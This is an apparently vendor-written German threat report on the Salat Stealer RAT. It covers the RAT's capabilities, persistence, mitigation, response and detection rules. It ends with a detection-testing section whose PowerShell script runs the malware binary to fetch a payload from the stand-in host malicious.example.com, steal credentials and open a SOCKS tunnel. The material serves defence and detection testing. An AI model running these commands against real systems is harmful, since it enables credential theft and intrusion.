Salat Stealer Analyse: Go-basierte RAT, C2-Resilienz und Informationsdiebstahl-Fähigkeiten
Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Salat Stealer ist ein auf Go basierender Remote-Access-Trojaner, der als umfassendes Post-Exploitation-Framework fungiert. Er unterstützt mehrere Kommunikationskanäle, darunter WebSocket, HTTP/2, HTTP/3 und QUIC, und bietet Betreibern flexible und robuste Kommandokontrolloptionen. Die Malware verfügt außerdem über umfangreiche Diebstahlmöglichkeiten für Anmeldeinformationen, zielt auf Browserdaten, Kryptowährungs-Wallets, Tastenanschläge, Screenshots und Netzwerk-Pivoting über SOCKS5 ab. Um Neustarts zu überstehen, verwendet sie versteckte Dateikopien, geplante Aufgaben und einen Run-Registrierungsschlüssel. Wenn ihre primäre Infrastruktur gestört wird, kann die Malware aktualisierte Kommandokontrollinformationen über die TON-Blockchain abrufen.
Untersuchung
Die Analyse erklärt, wie die Malware Verschlüsselungsschlüssel aus statischen Zeichenfolgen, kombiniert mit dem Hostnamen des Opfers, ableitet und sie dann verwendet, um fünf eingebettete Kommandokontroll-URLs zu entschlüsseln. Forscher dokumentierten auch, wie Salat Stealer sein Transportprotokoll auswählt, Betreiberbefehle verarbeitet, versucht, Privilegien zu eskalieren, und mehrere Persistenzmethoden auf dem Host bereitstellt. Der Bericht beschreibt weiter die Bandbreite der gestohlenen Daten und die erweiterten Fernzugriffsfunktionen, die dem Angreifer zur Verfügung stehen.
Minderung
Verteidiger sollten Verbindungen zu den identifizierten Kommandokontroll-URLs sowie unerwarteten QUIC- und WebSocket-Datenverkehr zu unbekannten Zielen überwachen. Sicherheitsteams sollten auch auf versteckte geplante Aufgaben und verdächtige Run-Schlüsseleinträge achten, die auf unbekannte ausführbare Dateien verweisen. Anwendungs-Whitelistings und strikte Ausführungskontrollen können verhindern, dass die auf Go basierende Nutzlast ausgeführt wird. Netzsegmentierung und TLS-Inspektion können die Sichtbarkeit verdächtigen ausgehenden Datenverkehrs, der mit der Malware in Verbindung steht, weiter verbessern.
Reaktion
Wird eine Aktivität des Salat Stealers festgestellt, sollte das betroffene System sofort isoliert, Speicher- und Festplattenimages gesammelt und die bösartigen Prozesse beendet werden. Alle Persistenzartefakte, einschließlich geplanter Aufgaben, Run-Schlüsseleinträge und versteckte Dateikopien, die von der Malware verwendet werden, sollten entfernt werden. Die identifizierten Kommandokontroll-Domains sollten blockiert werden, ebenso wie alle damit verbundenen TON-Blockchain-Abfragen, die für die Entdeckung von Infrastrukturfallbacks verwendet werden. Offengelegte Anmeldeinformationen und Kryptowährungs-Wallets sollten ebenfalls unverzüglich gedreht oder gesichert werden.
graph TB classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccffcc malware_salatr[„Malware: Salat Stealer (Go RAT)“] class malware_salatr malware process_start[„Prozess: Start von SalatStealer.exe“] class process_start process malware_salatr –> process_start persistence_task[„Geplante Aufgabe (versteckt)“] class persistence_task action persistence_reg[„Registry Run Key (HKCU\\Run)“] class persistence_reg action process_start –> persistence_task process_start –> persistence_reg defense_evasion[„Evasion: Obfuskation“] class defense_evasion action process_start –> defense_evasion discovery[„System-Discovery“] class discovery action process_start –> discovery credential_access[„Credential Harvesting + Keylogging“] class credential_access action process_start –> credential_access collection[„Screenshot + Video + ZIP“] class collection action credential_access –> collection c2[„C2 WebSocket/QUIC + Fallback“] class c2 action collection –> c2 exfiltration[„Daten-Exfiltration“] class exfiltration action c2 –> exfiltration command_exec[„Remote Command Execution“] class command_exec action exfiltration –> command_exec lateral[„Lateral Movement via SOCKS5“] class lateral action command_exec –> lateral
Angriffsablauf
Erkennungen
Verdächtige Kommando- und Kontrollanfragen durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfragen (via DNS)
Ansehen
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (via registry_event)
Ansehen
Systemprozesse ausführbar von atypischen Pfaden (via process_creation)
Ansehen
IOCs (HashSha256) zum Erkennen: Salat Stealer Analyse Go-basiertes RAT C2 Resilience und Informationsdiebstahlfähigkeiten
Ansehen
IOCs (HashSha1) zum Erkennen: Salat Stealer Analyse Go-basiertes RAT C2 Resilience und Informationsdiebstahlfähigkeiten
Ansehen
IOCs (HashMd5) zum Erkennen: Salat Stealer Analyse Go-basiertes RAT C2 Resilience und Informationsdiebstahlfähigkeiten
Ansehen
Erkennung von Salat Stealer RAT Aktivitäten [Windows Sysmon]
Ansehen
Erkennung von Salat Stealer C2 Kommunikationsmustern [Windows Netzwerkverbindung]
Ansehen
Ausführung und Moduserkennung von Salat Stealer [Windows Prozess-Erstellung]
Ansehen
Simulation Ausführung
Voraussetzung: Der Telemetrie- und Basislinien-Vorflugcheck muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Techniken (TTP) des Gegners, die entwickelt wurden, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die durch die Erkennungslogik erwartet wird.
-
Angriffserzählung & Befehle:
Ein Angreifer hat die Salat RAT Binärdatei (salat.exe) über einen Phishing-Anhang auf dem Opferhost bereitgestellt. Nach Erreichen eines low privilege Standpunkts führt der Angreifer die Binärdatei mit spezifischen Argumenten aus, um:- Ein sekundäres Payload herunterladen –
main.downloadFile https://malicious.example.com/payload.exe. - Gespeicherte Anmeldeinformationen stehlen –
main.Steal -module credentials. - Ein Peer-to-Peer SOCKS-Tunnel für laterale Bewegung einrichten –
main.p2pSocks -listen 1080 -remote 10.0.0.5:4444.
Die Binärdatei wird aus einer erhöhten PowerShell-Sitzung gestartet, um die Anforderung zur Erhöhung (T1548) zu erfüllen. Jede Ausführung erscheint als separates Sysmon-Prozesserstellungsereignis mit der entsprechenden Befehlszeile, was die Sigma-Regel-String-Match-Anforderung erfüllt.
- Ein sekundäres Payload herunterladen –
-
Regressionstest Skript:
# ------------------------------------------------- # Salat RAT Simulationsskript – löst Erkennung aus # ------------------------------------------------- $binaryPath = "C:Tempsalat.exe" # Sicherstellen, dass die Binärdatei existiert (Platzhalter – in einem echten Test würde die Binärdatei vorgestuft) if (-Not (Test-Path $binaryPath)) { Write-Error "Salat Binärdatei nicht gefunden auf $binaryPath" exit 1 } # 1. Sekundäres Payload herunterladen Start-Process -FilePath $binaryPath -ArgumentList "main.downloadFile https://malicious.example.com/payload.exe" -Wait # 2. Anmeldeinformationen stehlen Start-Process -FilePath $binaryPath -ArgumentList "main.Steal -module credentials" -Wait # 3. P2P SOCKS-Tunnel öffnen Start-Process -FilePath $binaryPath -ArgumentList "main.p2pSocks -listen 1080 -remote 10.0.0.5:4444" -Wait Write-Host "Simulation abgeschlossen." -
Bereinigungsbefehle:
# ------------------------------------------------- # Bereinigung für Salat RAT Simulation # ------------------------------------------------- # Beenden aller verbleibenden Salat-Prozesse Get-Process -Name "salat" -ErrorAction SilentlyContinue | Stop-Process -Force # Entfernen der Binärdatei (wenn erlaubt) $binaryPath = "C:Tempsalat.exe" if (Test-Path $binaryPath) { Remove-Item $binaryPath -Force Write-Host "Entfernt $binaryPath" } # Optional: Entfernen verwandter Sysmon-Ereignisse aus dem Testindex (Beispiel für Splunk) # splunk cmd search '| delete index=main host="test-host" sourcetype="Sysmon" earliest=-24h latest=now'